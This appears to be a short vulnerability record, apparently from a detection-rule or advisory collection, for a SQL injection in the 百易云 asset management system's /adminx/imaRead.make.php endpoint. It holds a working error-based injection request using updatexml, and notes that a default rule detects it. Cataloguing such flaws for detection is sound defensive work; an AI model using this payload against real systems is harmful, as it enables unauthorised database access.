vendor = "百易云"
name = "百易云资管系统imaRead.make.php SQL注入"
type = "SQL注入"
version = "未知"
path = "/adminx/imaRead.make.php"
detail = "POST /adminx/imaRead.make.php?act=remake HTTP/1.1 feeItem[]=1+AND+updatexml(1,concat(0x7e,md5(12345678)),1)"
fix = "缺省规则可检出"
date = "0707"
label = "1day"
verifier = "AdySec"
